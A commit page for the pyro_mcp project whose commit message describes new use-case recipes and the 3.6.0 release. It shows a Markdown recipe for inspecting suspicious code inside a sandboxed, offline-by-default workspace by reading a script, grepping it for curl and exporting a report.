Thales Maciel
894706af50
Turn the stable workspace surface into five documented, runnable stories with a shared guest-backed smoke runner, new docs/use-cases recipes, and Make targets for cold-start validation, repro/fix loops, parallel workspaces, untrusted inspection, and review/eval workflows. Bump the package and catalog surface to 3.6.0, update the main docs to point users from the stable workspace walkthrough into the recipe index and smoke packs, and mark the 3.6.0 roadmap milestone done. Fix a regression uncovered by the real parallel-workspaces smoke: workspace_file_read must not bump last_activity_at. Verified with uv lock, UV_CACHE_DIR=.uv-cache make check, UV_CACHE_DIR=.uv-cache make dist-check, and USE_CASE_ENVIRONMENT=debian:12 UV_CACHE_DIR=.uv-cache make smoke-use-cases.
34 lines
1,021 B
Markdown
34 lines
1,021 B
Markdown
# Unsafe Or Untrusted Code Inspection
|
|
|
|
Recommended profile: `workspace-core`
|
|
|
|
Smoke target:
|
|
|
|
```bash
|
|
make smoke-untrusted-inspection
|
|
```
|
|
|
|
Use this flow when the agent needs to inspect suspicious code or an unfamiliar
|
|
repo without granting more capabilities than necessary.
|
|
|
|
Canonical SDK flow:
|
|
|
|
```python
|
|
from pyro_mcp import Pyro
|
|
|
|
pyro = Pyro()
|
|
created = pyro.create_workspace(environment="debian:12", seed_path="./suspicious-repo")
|
|
workspace_id = str(created["workspace_id"])
|
|
|
|
pyro.list_workspace_files(workspace_id, path="/workspace", recursive=True)
|
|
pyro.read_workspace_file(workspace_id, "suspicious.sh")
|
|
pyro.exec_workspace(
|
|
workspace_id,
|
|
command="sh -lc \"grep -n 'curl' suspicious.sh > inspection-report.txt\"",
|
|
)
|
|
pyro.export_workspace(workspace_id, "inspection-report.txt", output_path="./inspection-report.txt")
|
|
pyro.delete_workspace(workspace_id)
|
|
```
|
|
|
|
This recipe stays offline-by-default, uses only explicit file reads and execs,
|
|
and exports only the inspection report the agent chose to materialize.
|